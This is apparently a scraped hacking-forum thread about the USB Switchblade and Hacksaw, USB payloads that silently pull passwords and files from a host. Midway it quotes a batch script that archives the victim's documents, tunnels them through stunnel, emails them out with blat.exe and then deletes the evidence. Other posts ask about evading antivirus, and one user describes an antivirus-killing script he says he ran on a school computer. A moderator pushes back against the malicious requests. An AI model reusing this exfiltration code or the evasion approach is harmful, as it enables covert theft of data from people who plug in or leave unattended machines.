USB Switchblade Development

Darren Kitchen

I can start thinking of future names for these tools like, "Skeleton Key" or "Light Saber" Hell even "Katana" as in future USB tool developments which I wish to only look into the future and see.

I wonder how long it will be until we get the Chainsaw out in use.

• 2 weeks later...
  • Replies 581
  • Created
  • Last Reply

Top Posters In This Topic

• 2 weeks later...
  • 3 weeks later...
Quick question. Does this still work without virus scan catching it?

I believe that it depends on which virus scanner you use.. But i'm quite sure that _some_ detects one or more of the files... You may look at my package. Even if AV catches it, nobody can find out that it originated from you usb drive, as the "viruses" will be extracted to %temp%.

• 2 weeks later...

Hey guys, i am having some trouble.

I cant seem to get the HACKSAW setup right.

I am using the Gonzor pack and up loader.

I was wondering if there is a specific package or a better version?

I would like to have a switchblade hack saw comb Hackblade.

We have some users where i work we thing take and bring USB drives with bad data and PRON and just bad stuff.

If you guys could help me that would be cool.

Hey guys, i am having some trouble.

I cant seem to get the HACKSAW setup right.

I am using the Gonzor pack and up loader.

I was wondering if there is a specific package or a better version?

I would like to have a switchblade hack saw comb Hackblade.

We have some users where i work we thing take and bring USB drives with bad data and PRON and just bad stuff.

If you guys could help me that would be cool.

IF you need notification of what files users bring on their USB drives, why HackBlade?

HackBlade extracts passwords from a computer too. Of course, I guess you might be extracting passwords out of your own computer.  :???:

Back on topic. Gonzor's payload is great. Just make sure that there is no space in between the "=" and your username and password

in the send.bat file. The username your send from and the one you send to should also be the same.

Hope this helps.

I would like passwords for other reason not so much the work side:P

Helped me remember some of my passwords :P

Plus thats the moder/hak side of me.

Ill go peek that out and check again.

Also i have some files that are newer then the ones on the site (hack5) so i am going back to the files posted on the site.

:: Archive documents in 8MB chunks

RAR a %computername%.rar .docs -v8192k -vn

STUNNEL-4.11.exe -install -quiet

NET START stunnel

GOTO setvariables

:cleanup

:: Stop stunnel

NET stop stunnel

STUNNEL-4.11.exe -uninstall -quiet

:: Delete documents

RD /s /q docs

DEL /q /f %computername%*.*

GOTO end

:sendfiles

for %%i in (%computername%.r*) do blat.exe %%i -base64 -to %emailto% -u %emailfrom% -pw %password% -f %emailfrom% -server 127.0.0.1:1099

GOTO cleanup

:setvariables

i put my email and pass in the red locations?

• 3 months later...

i'm having a few problems with the switchblade:

1) I try to put SBConfig v2 on my USB flash drive, but my USB drive won't allow it. I don't get any notification or anything.... I just simply can't put the executable on the flash drive... nothing happens. Anybody know what's going on?

2) So, in the meantime, I DL'ed the SBConfig v1.0.11, and i configured the payload... however, when i insert the USB drive, i get the folder: \System\Logs, but nothing is in it. It's not creating a folder or anything with the computer name.

Can anybody help me with these problems? I'm new at this, and I'm not having much luck.

Thanks!

**EDIT**

I think it has something to do with the computer permissions. I can drop the file on the USB drive if i change the extension to .txt, but when i try to change the extension back to .exe, I get an error saying "Cannot read from source file or disk"

Not to be mean, but...

If you write code half as bad as you spell your posts, it probably crashed the computer due to faulty programming. Your not leet, your not texting, your typing a post onto a forum. You have every character on the keyboard, USE THEM.

I don't want to have to sit here for 10 minutes, trying to figure out what you meant to say, questioning my sanity as I reread it again to get more insight into your mind.

Even if your native language is not English (which I'll bet it is), you should know better than to use numbers for letters, no other language does it, so it's not even the beginnings of an excuse. Say it right, or don't say it at all.

Now, back on topic...

That has been done before, but they get caught by in memory scanners eventually.

i am dislexic. and disgrapich, silexia is were the letter git jumbbled up in the brain , so say i may know how 2 spell it , but it crooses in the brain and insted i spell it incrotly , like god dog. disgrapa is were you dont have the moter skills, 2 say use a pin corectly, or when you tipe, youhit the rong key , my keybord, is twice the size of a ormal keybord becus of that , also i was taugt 2 tipe the normal way , but my so fuking smart parents , bout the keybord insted of the qwerty , its abcdefg con fig and whin i change it 2 the qwerty way my dad gits mad , becus he bot me sthis sepical key bord , becus its so mutch better, whin i still use a qwerty ast school , and my dad is a douchbag, one time i dint cut the grass win he was out of town so he gave away my bed

yes engilsh is my first langwidg, i usto run it threw word 2 spell check, but my new shit computer disk drive got bumped so thers a scrat on my disk , so non of the stock programs work , thangod windows was on a 15000 rpm bootup drive

i never sed i was leet , i just know a some stuf about computers ,

and i nead help with a new project, and i scruibe 2 the hack5 podcast. thot i go ther 2 ask som questns

If you do have those problems, I'm sorry. I didn't want to sound mean, just trying to keep people trying to do their best, and if that's what your doing, good.

As far as help, most of your projects seem like revenge things, or programs that could cause major harm to innocent people, should they spread beyond this site. If you came here specifically for that kind of stuff, I'm sorry, you came to the exact WRONG place. There are places that do this kind of thing, but it's not here. Hak 5 is more about the true art of the hacker, figuring things out that have never been done for, looking at things in new ways and discovering how to work around any problem, inventing new solutions as needed. (And yes, for the older members of the forum, I do realize which forum I'm making that statement in.)

I hope you don't leave us, just because of this, but decide to stay to see what all you can learn about.

im not black hat at worst gray hat, win i have all my papers form the year and the loewst grade is an 80, and the avrig of them with all the %s is a 93 but , he frogot 2 rite them down and whin i shoded them 2 him, the prinable , the superatendent, he sed thay wer foreged im a litle pissed whin he is the only 1 theatching that class, i half 2 take his agin

By this point I couldn't care if you're the king of England (and I'm pretty sure you're not), you're fast wearing down my patience. I can tolerate bad spelling, especially if there's a legitimate reason for it, but what you're asking for would get a scalding from me regardless of any deficiency you may or may not have.

So let me put this as simply as I can: we're not going to help you with this shit, and you really need to turn on spell check. I don't care about your shitty school life, I don't care that your parents apparently stealing your bed (and you're sounding less credible by the word at this point, and if it happened to be true then my bitching at you is the least of your worries) and I don't care that you think you have a legitimate reason for fucking over your teacher(s).

You're done here, if I see one more post from you requesting help to fuck over anybody, whether that be your parents, yous ex-schoomates, your teachers, whatever, I'm going to be forced to ban you.

You make your choice.

right now i am working on a scarscript that will disable anivirus, il poast it win i am dun

edit,how is guna work is its goin 2 go in 2 the defalt program dertory and look 4 the anti virus looking 4 almost all the antiviruses non 2 man, thin win it finds one , it will , then check in a derectory, 2 se what the prosese(s) ar and the end them with a ollyscript tipe, task manager, ther 4 disabling the antivius

You do know that antiviruses scan processes before they are allowed to execute, and when your program gets copied into memory to prepare to run it will get caught, right?

right now i am working on a scarscript that will disable anivirus, il poast it win i am dun

edit,how is guna work is its goin 2 go in 2 the defalt program dertory and look 4 the anti virus looking 4 almost all the antiviruses non 2 man, thin win it finds one , it will , then check in a derectory, 2 se what the prosese(s) ar and the end them with a ollyscript tipe, task manager, ther 4 disabling the antivius

You do know that antiviruses scan processes before they are allowed to execute, and when your program gets copied into memory to prepare to run it will get caught, right?

well since scar is unused and the script is open sorce , it wodnt trigger anny thing like it ive tested what i have on a school computer yesterday , and the school has semantaek and it worked, but since ists a difrint tipe of taskmaneger the adminstrater cant block the kill proses tree comand

well since scar is unused and the script is open sorce , it wodnt trigger anny thing like it ive tested what i have on a school computer yesterday , and the school has semantaek and it worked, but since ists a difrint tipe of taskmaneger the adminstrater cant block the kill proses tree comand

you must make hollywood movies

what is scar?